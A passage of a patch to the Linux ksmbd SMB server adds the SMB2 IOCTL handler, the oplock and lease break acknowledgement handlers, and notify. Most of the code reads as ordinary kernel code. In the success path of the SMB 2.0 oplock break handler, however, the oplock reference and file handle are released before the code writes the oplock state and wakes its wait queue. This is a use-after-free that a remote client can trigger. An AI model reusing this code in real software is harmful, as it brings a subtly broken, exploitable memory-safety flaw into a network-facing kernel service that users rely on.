++		nii_rsp->Next = 0;
++
++	rsp->PersistentFileId = SMB2_NO_FID;
++	rsp->VolatileFileId = SMB2_NO_FID;
++	return nbytes;
++}
++
++static int fsctl_validate_negotiate_info(struct ksmbd_conn *conn,
++					 struct validate_negotiate_info_req *neg_req,
++					 struct validate_negotiate_info_rsp *neg_rsp,
++					 unsigned int in_buf_len)
++{
++	int ret = 0;
++	int dialect;
++
++	if (in_buf_len < offsetof(struct validate_negotiate_info_req, Dialects) +
++			le16_to_cpu(neg_req->DialectCount) * sizeof(__le16))
++		return -EINVAL;
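++	/*
++	 * Illustrative sizing: each dialect entry is a 2-byte __le16,
++	 * so a request advertising DialectCount = 4 must carry at
++	 * least offsetof(Dialects) + 8 bytes of input.
++	 */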
++
++	dialect = ksmbd_lookup_dialect_by_id(neg_req->Dialects,
++					     neg_req->DialectCount);
++	if (dialect == BAD_PROT_ID || dialect != conn->dialect) {
++		ret = -EINVAL;
++		goto err_out;
++	}
++
++	if (strncmp(neg_req->Guid, conn->ClientGUID, SMB2_CLIENT_GUID_SIZE)) {
++		ret = -EINVAL;
++		goto err_out;
++	}
++
++	if (le16_to_cpu(neg_req->SecurityMode) != conn->cli_sec_mode) {
++		ret = -EINVAL;
++		goto err_out;
++	}
++
++	if (le32_to_cpu(neg_req->Capabilities) != conn->cli_cap) {
++		ret = -EINVAL;
++		goto err_out;
++	}
++
++	neg_rsp->Capabilities = cpu_to_le32(conn->vals->capabilities);
++	memset(neg_rsp->Guid, 0, SMB2_CLIENT_GUID_SIZE);
++	neg_rsp->SecurityMode = cpu_to_le16(conn->srv_sec_mode);
++	neg_rsp->Dialect = cpu_to_le16(conn->dialect);
++err_out:
++	return ret;
++}
++
++static int fsctl_query_allocated_ranges(struct ksmbd_work *work, u64 id,
++					struct file_allocated_range_buffer *qar_req,
++					struct file_allocated_range_buffer *qar_rsp,
++					unsigned int in_count, unsigned int *out_count)
++{
++	struct ksmbd_file *fp;
++	loff_t start, length;
++	int ret = 0;
++
++	*out_count = 0;
++	if (in_count == 0)
++		return -EINVAL;
++
++	start = le64_to_cpu(qar_req->file_offset);
++	length = le64_to_cpu(qar_req->length);
++
++	if (start < 0 || length < 0)
++		return -EINVAL;
++
++	fp = ksmbd_lookup_fd_fast(work, id);
++	if (!fp)
++		return -ENOENT;
++
++	ret = ksmbd_vfs_fqar_lseek(fp, start, length,
++				   qar_rsp, in_count, out_count);
++	if (ret && ret != -E2BIG)
++		*out_count = 0;
++
++	ksmbd_fd_put(work, fp);
++	return ret;
++}
++
++static int fsctl_pipe_transceive(struct ksmbd_work *work, u64 id,
++				 unsigned int out_buf_len,
++				 struct smb2_ioctl_req *req,
++				 struct smb2_ioctl_rsp *rsp)
++{
++	struct ksmbd_rpc_command *rpc_resp;
++	char *data_buf = (char *)&req->Buffer[0];
++	int nbytes = 0;
++
++	rpc_resp = ksmbd_rpc_ioctl(work->sess, id, data_buf,
++				   le32_to_cpu(req->InputCount));
++	if (rpc_resp) {
++		if (rpc_resp->flags == KSMBD_RPC_SOME_NOT_MAPPED) {
++			/*
++			 * set STATUS_SOME_NOT_MAPPED response
++			 * for unknown domain sid.
++			 */
++			rsp->hdr.Status = STATUS_SOME_NOT_MAPPED;
++		} else if (rpc_resp->flags == KSMBD_RPC_ENOTIMPLEMENTED) {
++			rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++			goto out;
++		} else if (rpc_resp->flags != KSMBD_RPC_OK) {
++			rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++			goto out;
++		}
++
++		nbytes = rpc_resp->payload_sz;
++		if (rpc_resp->payload_sz > out_buf_len) {
++			rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
++			nbytes = out_buf_len;
++		}
++
++		if (!rpc_resp->payload_sz) {
++			rsp->hdr.Status =
++				STATUS_UNEXPECTED_IO_ERROR;
++			goto out;
++		}
++
++		memcpy((char *)rsp->Buffer, rpc_resp->payload, nbytes);
++	}
++out:
++	kvfree(rpc_resp);
++	return nbytes;
++}
++
++static inline int fsctl_set_sparse(struct ksmbd_work *work, u64 id,
++				   struct file_sparse *sparse)
++{
++	struct ksmbd_file *fp;
++	struct user_namespace *user_ns;
++	int ret = 0;
++	__le32 old_fattr;
++
++	fp = ksmbd_lookup_fd_fast(work, id);
++	if (!fp)
++		return -ENOENT;
++	user_ns = file_mnt_user_ns(fp->filp);
++
++	old_fattr = fp->f_ci->m_fattr;
++	if (sparse->SetSparse)
++		fp->f_ci->m_fattr |= FILE_ATTRIBUTE_SPARSE_FILE_LE;
++	else
++		fp->f_ci->m_fattr &= ~FILE_ATTRIBUTE_SPARSE_FILE_LE;
++
++	if (fp->f_ci->m_fattr != old_fattr &&
++	    test_share_config_flag(work->tcon->share_conf,
++				   KSMBD_SHARE_FLAG_STORE_DOS_ATTRS)) {
++		struct xattr_dos_attrib da;
++
++		ret = ksmbd_vfs_get_dos_attrib_xattr(user_ns,
++						     fp->filp->f_path.dentry, &da);
++		if (ret <= 0)
++			goto out;
++
++		da.attr = le32_to_cpu(fp->f_ci->m_fattr);
++		ret = ksmbd_vfs_set_dos_attrib_xattr(user_ns,
++						     fp->filp->f_path.dentry, &da);
++		if (ret)
++			fp->f_ci->m_fattr = old_fattr;
++	}
++
++out:
++	ksmbd_fd_put(work, fp);
++	return ret;
++}
++
++static int fsctl_request_resume_key(struct ksmbd_work *work,
++				    struct smb2_ioctl_req *req,
++				    struct resume_key_ioctl_rsp *key_rsp)
++{
++	struct ksmbd_file *fp;
++
++	fp = ksmbd_lookup_fd_slow(work, req->VolatileFileId, req->PersistentFileId);
++	if (!fp)
++		return -ENOENT;
++
++	memset(key_rsp, 0, sizeof(*key_rsp));
++	key_rsp->ResumeKey[0] = req->VolatileFileId;
++	key_rsp->ResumeKey[1] = req->PersistentFileId;
++	ksmbd_fd_put(work, fp);
++
++	return 0;
++}
++
++/**
++ * smb2_ioctl() - handler for smb2 ioctl command
++ * @work:	smb work containing ioctl command buffer
++ *
++ * Return:	0 on success, otherwise error
++ */
++int smb2_ioctl(struct ksmbd_work *work)
++{
++	struct smb2_ioctl_req *req;
++	struct smb2_ioctl_rsp *rsp;
++	unsigned int cnt_code, nbytes = 0, out_buf_len, in_buf_len;
++	u64 id = KSMBD_NO_FID;
++	struct ksmbd_conn *conn = work->conn;
++	int ret = 0;
++
++	if (work->next_smb2_rcv_hdr_off) {
++		req = ksmbd_req_buf_next(work);
++		rsp = ksmbd_resp_buf_next(work);
++		if (!has_file_id(req->VolatileFileId)) {
++			ksmbd_debug(SMB, "Compound request set FID = %llu\n",
++				    work->compound_fid);
++			id = work->compound_fid;
++		}
++	} else {
++		req = smb2_get_msg(work->request_buf);
++		rsp = smb2_get_msg(work->response_buf);
++	}
++
++	if (!has_file_id(id))
++		id = req->VolatileFileId;
++
++	if (req->Flags != cpu_to_le32(SMB2_0_IOCTL_IS_FSCTL)) {
++		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++		goto out;
++	}
++
++	cnt_code = le32_to_cpu(req->CtlCode);
++	ret = smb2_calc_max_out_buf_len(work, 48,
++					le32_to_cpu(req->MaxOutputResponse));
++	if (ret < 0) {
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		goto out;
++	}
++	out_buf_len = (unsigned int)ret;
++	in_buf_len = le32_to_cpu(req->InputCount);
++
++	switch (cnt_code) {
++	case FSCTL_DFS_GET_REFERRALS:
++	case FSCTL_DFS_GET_REFERRALS_EX:
++		/* DFS is not supported yet */
++		rsp->hdr.Status = STATUS_FS_DRIVER_REQUIRED;
++		goto out;
++	case FSCTL_CREATE_OR_GET_OBJECT_ID:
++	{
++		struct file_object_buf_type1_ioctl_rsp *obj_buf;
++
++		nbytes = sizeof(struct file_object_buf_type1_ioctl_rsp);
++		obj_buf = (struct file_object_buf_type1_ioctl_rsp *)
++			&rsp->Buffer[0];
++
++		/*
++		 * TODO: this is a dummy implementation to pass smbtorture;
++		 * the correct response still needs to be verified
++		 */
++		memset(obj_buf->ObjectId, 0x0, 16);
++		memset(obj_buf->BirthVolumeId, 0x0, 16);
++		memset(obj_buf->BirthObjectId, 0x0, 16);
++		memset(obj_buf->DomainId, 0x0, 16);
++
++		break;
++	}
++	case FSCTL_PIPE_TRANSCEIVE:
++		out_buf_len = min_t(u32, KSMBD_IPC_MAX_PAYLOAD, out_buf_len);
++		nbytes = fsctl_pipe_transceive(work, id, out_buf_len, req, rsp);
++		break;
++	case FSCTL_VALIDATE_NEGOTIATE_INFO:
++		if (conn->dialect < SMB30_PROT_ID) {
++			ret = -EOPNOTSUPP;
++			goto out;
++		}
++
++		if (in_buf_len < offsetof(struct validate_negotiate_info_req,
++					  Dialects)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		if (out_buf_len < sizeof(struct validate_negotiate_info_rsp)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		ret = fsctl_validate_negotiate_info(conn,
++			(struct validate_negotiate_info_req *)&req->Buffer[0],
++			(struct validate_negotiate_info_rsp *)&rsp->Buffer[0],
++			in_buf_len);
++		if (ret < 0)
++			goto out;
++
++		nbytes = sizeof(struct validate_negotiate_info_rsp);
++		rsp->PersistentFileId = SMB2_NO_FID;
++		rsp->VolatileFileId = SMB2_NO_FID;
++		break;
++	case FSCTL_QUERY_NETWORK_INTERFACE_INFO:
++		ret = fsctl_query_iface_info_ioctl(conn, rsp, out_buf_len);
++		if (ret < 0)
++			goto out;
++		nbytes = ret;
++		break;
++	case FSCTL_REQUEST_RESUME_KEY:
++		if (out_buf_len < sizeof(struct resume_key_ioctl_rsp)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		ret = fsctl_request_resume_key(work, req,
++					       (struct resume_key_ioctl_rsp *)&rsp->Buffer[0]);
++		if (ret < 0)
++			goto out;
++		rsp->PersistentFileId = req->PersistentFileId;
++		rsp->VolatileFileId = req->VolatileFileId;
++		nbytes = sizeof(struct resume_key_ioctl_rsp);
++		break;
++	case FSCTL_COPYCHUNK:
++	case FSCTL_COPYCHUNK_WRITE:
++		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++			ksmbd_debug(SMB,
++				    "User does not have write permission\n");
++			ret = -EACCES;
++			goto out;
++		}
++
++		if (in_buf_len < sizeof(struct copychunk_ioctl_req)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		if (out_buf_len < sizeof(struct copychunk_ioctl_rsp)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		nbytes = sizeof(struct copychunk_ioctl_rsp);
++		rsp->VolatileFileId = req->VolatileFileId;
++		rsp->PersistentFileId = req->PersistentFileId;
++		fsctl_copychunk(work,
++				(struct copychunk_ioctl_req *)&req->Buffer[0],
++				le32_to_cpu(req->CtlCode),
++				le32_to_cpu(req->InputCount),
++				req->VolatileFileId,
++				req->PersistentFileId,
++				rsp);
++		break;
++	case FSCTL_SET_SPARSE:
++		if (in_buf_len < sizeof(struct file_sparse)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		ret = fsctl_set_sparse(work, id,
++				       (struct file_sparse *)&req->Buffer[0]);
++		if (ret < 0)
++			goto out;
++		break;
++	case FSCTL_SET_ZERO_DATA:
++	{
++		struct file_zero_data_information *zero_data;
++		struct ksmbd_file *fp;
++		loff_t off, len, bfz;
++
++		if (!test_tree_conn_flag(work->tcon, KSMBD_TREE_CONN_FLAG_WRITABLE)) {
++			ksmbd_debug(SMB,
++				    "User does not have write permission\n");
++			ret = -EACCES;
++			goto out;
++		}
++
++		if (in_buf_len < sizeof(struct file_zero_data_information)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		zero_data =
++			(struct file_zero_data_information *)&req->Buffer[0];
++
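++		/*
++		 * Per MS-FSCC the zeroed range is [FileOffset,
++		 * BeyondFinalZero); the end offset is exclusive, so an
++		 * equal pair is a valid zero-length request.
++		 */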
++		off = le64_to_cpu(zero_data->FileOffset);
++		bfz = le64_to_cpu(zero_data->BeyondFinalZero);
++		if (off < 0 || bfz < 0 || off > bfz) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		len = bfz - off;
++		if (len) {
++			fp = ksmbd_lookup_fd_fast(work, id);
++			if (!fp) {
++				ret = -ENOENT;
++				goto out;
++			}
++
++			ret = ksmbd_vfs_zero_data(work, fp, off, len);
++			ksmbd_fd_put(work, fp);
++			if (ret < 0)
++				goto out;
++		}
++		break;
++	}
++	case FSCTL_QUERY_ALLOCATED_RANGES:
++		if (in_buf_len < sizeof(struct file_allocated_range_buffer)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
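++		/*
++		 * out_buf_len is converted to a count of range descriptors;
++		 * -E2BIG means more ranges exist than fit and maps to
++		 * STATUS_BUFFER_OVERFLOW with a valid partial list.
++		 */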
++		ret = fsctl_query_allocated_ranges(work, id,
++			(struct file_allocated_range_buffer *)&req->Buffer[0],
++			(struct file_allocated_range_buffer *)&rsp->Buffer[0],
++			out_buf_len /
++			sizeof(struct file_allocated_range_buffer), &nbytes);
++		if (ret == -E2BIG) {
++			rsp->hdr.Status = STATUS_BUFFER_OVERFLOW;
++		} else if (ret < 0) {
++			nbytes = 0;
++			goto out;
++		}
++
++		nbytes *= sizeof(struct file_allocated_range_buffer);
++		break;
++	case FSCTL_GET_REPARSE_POINT:
++	{
++		struct reparse_data_buffer *reparse_ptr;
++		struct ksmbd_file *fp;
++
++		reparse_ptr = (struct reparse_data_buffer *)&rsp->Buffer[0];
++		fp = ksmbd_lookup_fd_fast(work, id);
++		if (!fp) {
++			pr_err("fp not found\n");
++			ret = -ENOENT;
++			goto out;
++		}
++
++		reparse_ptr->ReparseTag =
++			smb2_get_reparse_tag_special_file(file_inode(fp->filp)->i_mode);
++		reparse_ptr->ReparseDataLength = 0;
++		ksmbd_fd_put(work, fp);
++		nbytes = sizeof(struct reparse_data_buffer);
++		break;
++	}
++	case FSCTL_DUPLICATE_EXTENTS_TO_FILE:
++	{
++		struct ksmbd_file *fp_in, *fp_out = NULL;
++		struct duplicate_extents_to_file *dup_ext;
++		loff_t src_off, dst_off, length, cloned;
++
++		if (in_buf_len < sizeof(struct duplicate_extents_to_file)) {
++			ret = -EINVAL;
++			goto out;
++		}
++
++		dup_ext = (struct duplicate_extents_to_file *)&req->Buffer[0];
++
++		fp_in = ksmbd_lookup_fd_slow(work, dup_ext->VolatileFileHandle,
++					     dup_ext->PersistentFileHandle);
++		if (!fp_in) {
++			pr_err("source file handle not found in duplicate extents to file\n");
++			ret = -ENOENT;
++			goto out;
++		}
++
++		fp_out = ksmbd_lookup_fd_fast(work, id);
++		if (!fp_out) {
++			pr_err("target fp not found\n");
++			ret = -ENOENT;
++			goto dup_ext_out;
++		}
++
++		src_off = le64_to_cpu(dup_ext->SourceFileOffset);
++		dst_off = le64_to_cpu(dup_ext->TargetFileOffset);
++		length = le64_to_cpu(dup_ext->ByteCount);
++		/*
++		 * XXX: It is not clear if FSCTL_DUPLICATE_EXTENTS_TO_FILE
++		 * should fall back to vfs_copy_file_range().  This could be
++		 * beneficial when re-exporting an nfs/smb mount, but note that
++		 * it can result in a partial copy that returns an error status.
++		 * If/when FSCTL_DUPLICATE_EXTENTS_TO_FILE_EX is implemented,
++		 * the fallback to vfs_copy_file_range() should be avoided when
++		 * the DUPLICATE_EXTENTS_DATA_EX_SOURCE_ATOMIC flag is set.
++		 */
++		cloned = vfs_clone_file_range(fp_in->filp, src_off,
++					      fp_out->filp, dst_off, length, 0);
++		if (cloned == -EXDEV || cloned == -EOPNOTSUPP) {
++			ret = -EOPNOTSUPP;
++			goto dup_ext_out;
++		} else if (cloned != length) {
++			cloned = vfs_copy_file_range(fp_in->filp, src_off,
++						     fp_out->filp, dst_off,
++						     length, 0);
++			if (cloned != length) {
++				if (cloned < 0)
++					ret = cloned;
++				else
++					ret = -EINVAL;
++			}
++		}
++
++dup_ext_out:
++		ksmbd_fd_put(work, fp_in);
++		ksmbd_fd_put(work, fp_out);
++		if (ret < 0)
++			goto out;
++		break;
++	}
++	default:
++		ksmbd_debug(SMB, "not implemented yet ioctl command 0x%x\n",
++			    cnt_code);
++		ret = -EOPNOTSUPP;
++		goto out;
++	}
++
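++	/*
++	 * Fixed IOCTL response layout: StructureSize is always 49 and the
++	 * input/output data follows the 64-byte SMB2 header plus the
++	 * 48-byte response body, hence offset 112.
++	 */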
++	rsp->CtlCode = cpu_to_le32(cnt_code);
++	rsp->InputCount = cpu_to_le32(0);
++	rsp->InputOffset = cpu_to_le32(112);
++	rsp->OutputOffset = cpu_to_le32(112);
++	rsp->OutputCount = cpu_to_le32(nbytes);
++	rsp->StructureSize = cpu_to_le16(49);
++	rsp->Reserved = cpu_to_le16(0);
++	rsp->Flags = cpu_to_le32(0);
++	rsp->Reserved2 = cpu_to_le32(0);
++	inc_rfc1001_len(work->response_buf, 48 + nbytes);
++
++	return 0;
++
++out:
++	if (ret == -EACCES)
++		rsp->hdr.Status = STATUS_ACCESS_DENIED;
++	else if (ret == -ENOENT)
++		rsp->hdr.Status = STATUS_OBJECT_NAME_NOT_FOUND;
++	else if (ret == -EOPNOTSUPP)
++		rsp->hdr.Status = STATUS_NOT_SUPPORTED;
++	else if (ret == -ENOSPC)
++		rsp->hdr.Status = STATUS_BUFFER_TOO_SMALL;
++	else if (ret < 0 || rsp->hdr.Status == 0)
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++	smb2_set_err_rsp(work);
++	return 0;
++}
++
++/**
++ * smb20_oplock_break_ack() - handler for smb2.0 oplock break command
++ * @work:	smb work containing oplock break command buffer
++ */
++static void smb20_oplock_break_ack(struct ksmbd_work *work)
++{
++	struct smb2_oplock_break *req = smb2_get_msg(work->request_buf);
++	struct smb2_oplock_break *rsp = smb2_get_msg(work->response_buf);
++	struct ksmbd_file *fp;
++	struct oplock_info *opinfo = NULL;
++	__le32 err = 0;
++	int ret = 0;
++	u64 volatile_id, persistent_id;
++	char req_oplevel = 0, rsp_oplevel = 0;
++	unsigned int oplock_change_type;
++
++	volatile_id = req->VolatileFid;
++	persistent_id = req->PersistentFid;
++	req_oplevel = req->OplockLevel;
++	ksmbd_debug(OPLOCK, "v_id %llu, p_id %llu request oplock level %d\n",
++		    volatile_id, persistent_id, req_oplevel);
++
++	fp = ksmbd_lookup_fd_slow(work, volatile_id, persistent_id);
++	if (!fp) {
++		rsp->hdr.Status = STATUS_FILE_CLOSED;
++		smb2_set_err_rsp(work);
++		return;
++	}
++
++	opinfo = opinfo_get(fp);
++	if (!opinfo) {
++		pr_err("unexpected null oplock_info\n");
++		rsp->hdr.Status = STATUS_INVALID_OPLOCK_PROTOCOL;
++		smb2_set_err_rsp(work);
++		ksmbd_fd_put(work, fp);
++		return;
++	}
++
++	if (opinfo->level == SMB2_OPLOCK_LEVEL_NONE) {
++		rsp->hdr.Status = STATUS_INVALID_OPLOCK_PROTOCOL;
++		goto err_out;
++	}
++
++	if (opinfo->op_state == OPLOCK_STATE_NONE) {
++		ksmbd_debug(SMB, "unexpected oplock state 0x%x\n", opinfo->op_state);
++		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
++		goto err_out;
++	}
++
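++	/*
++	 * Classify the acknowledged transition: an exclusive/batch oplock
++	 * may only be broken down to level II or none, and a level II
++	 * oplock only to none; anything else is answered with
++	 * STATUS_INVALID_OPLOCK_PROTOCOL.
++	 */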
++	if ((opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE ||
++	     opinfo->level == SMB2_OPLOCK_LEVEL_BATCH) &&
++	    (req_oplevel != SMB2_OPLOCK_LEVEL_II &&
++	     req_oplevel != SMB2_OPLOCK_LEVEL_NONE)) {
++		err = STATUS_INVALID_OPLOCK_PROTOCOL;
++		oplock_change_type = OPLOCK_WRITE_TO_NONE;
++	} else if (opinfo->level == SMB2_OPLOCK_LEVEL_II &&
++		   req_oplevel != SMB2_OPLOCK_LEVEL_NONE) {
++		err = STATUS_INVALID_OPLOCK_PROTOCOL;
++		oplock_change_type = OPLOCK_READ_TO_NONE;
++	} else if (req_oplevel == SMB2_OPLOCK_LEVEL_II ||
++		   req_oplevel == SMB2_OPLOCK_LEVEL_NONE) {
++		err = STATUS_INVALID_DEVICE_STATE;
++		if ((opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE ||
++		     opinfo->level == SMB2_OPLOCK_LEVEL_BATCH) &&
++		    req_oplevel == SMB2_OPLOCK_LEVEL_II) {
++			oplock_change_type = OPLOCK_WRITE_TO_READ;
++		} else if ((opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE ||
++			    opinfo->level == SMB2_OPLOCK_LEVEL_BATCH) &&
++			   req_oplevel == SMB2_OPLOCK_LEVEL_NONE) {
++			oplock_change_type = OPLOCK_WRITE_TO_NONE;
++		} else if (opinfo->level == SMB2_OPLOCK_LEVEL_II &&
++			   req_oplevel == SMB2_OPLOCK_LEVEL_NONE) {
++			oplock_change_type = OPLOCK_READ_TO_NONE;
++		} else {
++			oplock_change_type = 0;
++		}
++	} else {
++		oplock_change_type = 0;
++	}
++
++	switch (oplock_change_type) {
++	case OPLOCK_WRITE_TO_READ:
++		ret = opinfo_write_to_read(opinfo);
++		rsp_oplevel = SMB2_OPLOCK_LEVEL_II;
++		break;
++	case OPLOCK_WRITE_TO_NONE:
++		ret = opinfo_write_to_none(opinfo);
++		rsp_oplevel = SMB2_OPLOCK_LEVEL_NONE;
++		break;
++	case OPLOCK_READ_TO_NONE:
++		ret = opinfo_read_to_none(opinfo);
++		rsp_oplevel = SMB2_OPLOCK_LEVEL_NONE;
++		break;
++	default:
++		pr_err("unknown oplock change 0x%x -> 0x%x\n",
++		       opinfo->level, rsp_oplevel);
++	}
++
++	if (ret < 0) {
++		rsp->hdr.Status = err;
++		goto err_out;
++	}
++
++	opinfo_put(opinfo);
++	ksmbd_fd_put(work, fp);
++	opinfo->op_state = OPLOCK_STATE_NONE;
++	wake_up_interruptible_all(&opinfo->oplock_q);
++
++	rsp->StructureSize = cpu_to_le16(24);
++	rsp->OplockLevel = rsp_oplevel;
++	rsp->Reserved = 0;
++	rsp->Reserved2 = 0;
++	rsp->VolatileFid = volatile_id;
++	rsp->PersistentFid = persistent_id;
++	inc_rfc1001_len(work->response_buf, 24);
++	return;
++
++err_out:
++	opinfo->op_state = OPLOCK_STATE_NONE;
++	wake_up_interruptible_all(&opinfo->oplock_q);
++
++	opinfo_put(opinfo);
++	ksmbd_fd_put(work, fp);
++	smb2_set_err_rsp(work);
++}
++
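++/*
++ * check_lease_state() - validate a client-acknowledged lease state.
++ * When the server requested a downgrade to read+handle caching, any
++ * acked state without write caching is accepted; otherwise the ack
++ * must match the expected new_state exactly.
++ *
++ * Return: 0 if the state is accepted, 1 otherwise
++ */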
++static int check_lease_state(struct lease *lease, __le32 req_state)
++{
++	if ((lease->new_state ==
++	     (SMB2_LEASE_READ_CACHING_LE | SMB2_LEASE_HANDLE_CACHING_LE)) &&
++	    !(req_state & SMB2_LEASE_WRITE_CACHING_LE)) {
++		lease->new_state = req_state;
++		return 0;
++	}
++
++	if (lease->new_state == req_state)
++		return 0;
++
++	return 1;
++}
++
++/**
++ * smb21_lease_break_ack() - handler for smb2.1 lease break command
++ * @work:	smb work containing lease break command buffer
++ */
++static void smb21_lease_break_ack(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_lease_ack *req = smb2_get_msg(work->request_buf);
++	struct smb2_lease_ack *rsp = smb2_get_msg(work->response_buf);
++	struct oplock_info *opinfo;
++	__le32 err = 0;
++	int ret = 0;
++	unsigned int lease_change_type;
++	__le32 lease_state;
++	struct lease *lease;
++
++	ksmbd_debug(OPLOCK, "smb21 lease break, lease state(0x%x)\n",
++		    le32_to_cpu(req->LeaseState));
++	opinfo = lookup_lease_in_table(conn, req->LeaseKey);
++	if (!opinfo) {
++		ksmbd_debug(OPLOCK, "file not opened\n");
++		smb2_set_err_rsp(work);
++		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
++		return;
++	}
++	lease = opinfo->o_lease;
++
++	if (opinfo->op_state == OPLOCK_STATE_NONE) {
++		pr_err("unexpected lease break state 0x%x\n",
++		       opinfo->op_state);
++		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
++		goto err_out;
++	}
++
++	if (check_lease_state(lease, req->LeaseState)) {
++		rsp->hdr.Status = STATUS_REQUEST_NOT_ACCEPTED;
++		ksmbd_debug(OPLOCK,
++			    "req lease state: 0x%x, expected state: 0x%x\n",
++			    req->LeaseState, lease->new_state);
++		goto err_out;
++	}
++
++	if (!atomic_read(&opinfo->breaking_cnt)) {
++		rsp->hdr.Status = STATUS_UNSUCCESSFUL;
++		goto err_out;
++	}
++
++	/* check for bad lease state */
++	if (req->LeaseState &
++	    (~(SMB2_LEASE_READ_CACHING_LE | SMB2_LEASE_HANDLE_CACHING_LE))) {
++		err = STATUS_INVALID_OPLOCK_PROTOCOL;
++		if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
++			lease_change_type = OPLOCK_WRITE_TO_NONE;
++		else
++			lease_change_type = OPLOCK_READ_TO_NONE;
++		ksmbd_debug(OPLOCK, "handle bad lease state 0x%x -> 0x%x\n",
++			    le32_to_cpu(lease->state),
++			    le32_to_cpu(req->LeaseState));
++	} else if (lease->state == SMB2_LEASE_READ_CACHING_LE &&
++		   req->LeaseState != SMB2_LEASE_NONE_LE) {
++		err = STATUS_INVALID_OPLOCK_PROTOCOL;
++		lease_change_type = OPLOCK_READ_TO_NONE;
++		ksmbd_debug(OPLOCK, "handle bad lease state 0x%x -> 0x%x\n",
++			    le32_to_cpu(lease->state),
++			    le32_to_cpu(req->LeaseState));
++	} else {
++		/* valid lease state changes */
++		err = STATUS_INVALID_DEVICE_STATE;
++		if (req->LeaseState == SMB2_LEASE_NONE_LE) {
++			if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
++				lease_change_type = OPLOCK_WRITE_TO_NONE;
++			else
++				lease_change_type = OPLOCK_READ_TO_NONE;
++		} else if (req->LeaseState & SMB2_LEASE_READ_CACHING_LE) {
++			if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
++				lease_change_type = OPLOCK_WRITE_TO_READ;
++			else
++				lease_change_type = OPLOCK_READ_HANDLE_TO_READ;
++		} else {
++			lease_change_type = 0;
++		}
++	}
++
++	switch (lease_change_type) {
++	case OPLOCK_WRITE_TO_READ:
++		ret = opinfo_write_to_read(opinfo);
++		break;
++	case OPLOCK_READ_HANDLE_TO_READ:
++		ret = opinfo_read_handle_to_read(opinfo);
++		break;
++	case OPLOCK_WRITE_TO_NONE:
++		ret = opinfo_write_to_none(opinfo);
++		break;
++	case OPLOCK_READ_TO_NONE:
++		ret = opinfo_read_to_none(opinfo);
++		break;
++	default:
++		ksmbd_debug(OPLOCK, "unknown lease change 0x%x -> 0x%x\n",
++			    le32_to_cpu(lease->state),
++			    le32_to_cpu(req->LeaseState));
++	}
++
++	lease_state = lease->state;
++	opinfo->op_state = OPLOCK_STATE_NONE;
++	wake_up_interruptible_all(&opinfo->oplock_q);
++	atomic_dec(&opinfo->breaking_cnt);
++	wake_up_interruptible_all(&opinfo->oplock_brk);
++	opinfo_put(opinfo);
++
++	if (ret < 0) {
++		rsp->hdr.Status = err;
++		goto err_out;
++	}
++
++	rsp->StructureSize = cpu_to_le16(36);
++	rsp->Reserved = 0;
++	rsp->Flags = 0;
++	memcpy(rsp->LeaseKey, req->LeaseKey, 16);
++	rsp->LeaseState = lease_state;
++	rsp->LeaseDuration = 0;
++	inc_rfc1001_len(work->response_buf, 36);
++	return;
++
++err_out:
++	opinfo->op_state = OPLOCK_STATE_NONE;
++	wake_up_interruptible_all(&opinfo->oplock_q);
++	atomic_dec(&opinfo->breaking_cnt);
++	wake_up_interruptible_all(&opinfo->oplock_brk);
++
++	opinfo_put(opinfo);
++	smb2_set_err_rsp(work);
++}
++
++/**
++ * smb2_oplock_break() - dispatcher for smb2.0 and 2.1 oplock/lease break
++ * @work:	smb work containing oplock/lease break command buffer
++ *
++ * Return:	0
++ */
++int smb2_oplock_break(struct ksmbd_work *work)
++{
++	struct smb2_oplock_break *req = smb2_get_msg(work->request_buf);
++	struct smb2_oplock_break *rsp = smb2_get_msg(work->response_buf);
++
++	switch (le16_to_cpu(req->StructureSize)) {
++	case OP_BREAK_STRUCT_SIZE_20:
++		smb20_oplock_break_ack(work);
++		break;
++	case OP_BREAK_STRUCT_SIZE_21:
++		smb21_lease_break_ack(work);
++		break;
++	default:
++		ksmbd_debug(OPLOCK, "invalid break cmd %d\n",
++			    le16_to_cpu(req->StructureSize));
++		rsp->hdr.Status = STATUS_INVALID_PARAMETER;
++		smb2_set_err_rsp(work);
++	}
++
++	return 0;
++}
++
++/**
++ * smb2_notify() - handler for smb2 notify request
++ * @work:   smb work containing notify command buffer
++ *
++ * Return:      0
++ */
++int smb2_notify(struct ksmbd_work *work)
++{
++	struct smb2_change_notify_req *req;
++	struct smb2_change_notify_rsp *rsp;
++
++	WORK_BUFFERS(work, req, rsp);
++
++	if (work->next_smb2_rcv_hdr_off && req->hdr.NextCommand) {
++		rsp->hdr.Status = STATUS_INTERNAL_ERROR;
++		smb2_set_err_rsp(work);
++		return 0;
++	}
++
++	smb2_set_err_rsp(work);
++	rsp->hdr.Status = STATUS_NOT_IMPLEMENTED;
++	return 0;
++}
++
++/**
++ * smb2_is_sign_req() - handler for checking packet signing status
++ * @work:	smb work containing notify command buffer
++ * @command:	SMB2 command id
++ *
++ * Return:	true if the packet is signed, false otherwise
++ */
++bool smb2_is_sign_req(struct ksmbd_work *work, unsigned int command)
++{
++	struct smb2_hdr *rcv_hdr2 = smb2_get_msg(work->request_buf);
++
